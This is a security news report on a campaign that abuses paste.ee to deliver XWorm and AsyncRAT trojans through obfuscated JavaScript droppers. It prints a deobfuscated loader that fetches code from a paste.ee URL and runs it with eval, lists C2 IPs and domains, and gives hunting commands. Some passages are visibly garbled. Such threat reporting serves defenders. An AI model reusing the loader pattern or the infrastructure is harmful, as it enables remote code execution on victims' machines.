A recent investigation by cybersecurity researchers has revealed a highly stealthy malware distribution campaign abusing the legitimate paste.ee service as a command-and-control (C&C) hub.
The attackers use advanced obfuscation techniques in JavaScript droppers to deliver powerful remote access trojans (RATs) like XWorm and AsyncRAT, evading conventional security detection and complicating incident response efforts.
The attack chain begins with the distribution of weaponized JavaScript files. One such sample, disguised as “DOCUMENT FOR DELIVERY INFORMATION.js”, was uploaded to malware repositories and flagged due to behavioral markers reminiscent of RemcosRAT.
Obfuscation Mechanisms:
ᙓೇᰖ∛ᩕዀ╬ᤳK⨀Ḣڑ⦝〒) throughout its strings and logic, making static analysis and detection challenging.Network Communication:
MSXML2.XMLHTTP ActiveX object, initiating an HTTP GET request to an obfuscated paste.ee URL (e.g., http://paste.ee/d/s1uVin8i/0).Function constructor.Deobfuscated Loader Sample:
javascript// Pseudocode summary after removing junk Unicode and decoding logic
var xmlhttp = new ActiveXObject("MSXML2.XMLHTTP");
xmlhttp.open("GET", "http://paste.ee/d/s1uVin8i/0", false);
xmlhttp.send();
eval(xmlhttp.responseText);
This loader model enables the adversary to swap payloads on demand simply by updating the paste at paste.ee—without altering the delivery infrastructure or initial dropper.
Malicious Paste.ee Usage
Researchers mapped a network of paste.ee URLs distributing encoded PE files, obfuscated scripts, and configuration data. Regex-based hunting revealed consistent patterns in malicious paste URLs (e.g., https:\/\/paste\.ee\/[a-z]\/[A-Za-z0-9]+\/0$), allowing defenders to programmatically extract and track related campaigns.
Extraction and Verification Process:
jq -r ".url" export.ndjson > urls.txthttpx -l urls.txt -mc 200 -o 200urls.txtCommand-and-Control (C2) Infrastructure
On decoding configuration data, primary C2 domains such as abuwire123[.]ddns[.]net emerged, resolving to IPs like 45.145.43.244 (Frankfurt, Germany, ASN: AS58212). The C2 network was found to span both Europe and the U.S., with notable async tunnels:
| IP Address | Ports | Service | Certificate Label | First Seen |
|---|---|---|---|---|
| 45.145.43.244 | 6606 | XWorm C2 | AsyncRAT | Feb 24, 2025 |
| 66.63.187.154 | 6606 | AsyncRAT C2 | AsyncRAT | Feb 2025 |
| 66.63.187.232 | 8808 | XWorm C2 | AsyncRAT | Feb 2025 |
| 196.251.118.41 | 8808 | AsyncRAT C2 | AsyncRAT | Feb 2025 |
Technical Capabilities of XWorm:
AsyncRAT Characteristics:
Threat Indicators and Mitigation Strategies
Indicators of Compromise (IOCs)
| IP Address | Domain | Hosting Company | Location |
|---|---|---|---|
| 45.145.43.244 | abuwire123[.]ddns[.]net | dataforest GmbH (ASN: AS58212) | Frankfurt, Germany |
| 66.63.187.154 | Not Available | QuadraNet Enterprises LLC | United States |
| 66.63.187.232 | abuwire123h[.]ddns[.]net abuwire123[.]duckdns[.]org | QuadraNet Enterprises LLC | United States |
| 196.251.118.41 | Not Available | Not Available | Not Available |
| 23.186.113.60 | paste.ee | Not Available | Not Available |
The innovative misuse of paste.ee as a rapidly updatable C&C hub, combined with sophisticated JavaScript obfuscation and a dispersed C2 infrastructure, demonstrates the evolving tactics of modern malware actors. XWorm and AsyncRAT remain potent threats, and defenders must adapt with multi-layered detection and robust network hygiene.
PortSwigger has leveled up Burp Suite's scanning arsenal with the latest Active Scan++ extension, version…
Unit 42 researchers at Palo Alto Networks exposed serious flaws in the Model Context Protocol…
Polish police have arrested three Ukrainian men traveling through Europe and seized a cache of…
Google has launched its most significant Chrome update ever, embedding Gemini AI across the browser…
Attackers exploit this vulnerability through the router's web interface components, specifically "cgibin" and "hnap_main," by…
Security researchers have uncovered a severe flaw in Apache Tika, a popular open-source toolkit for…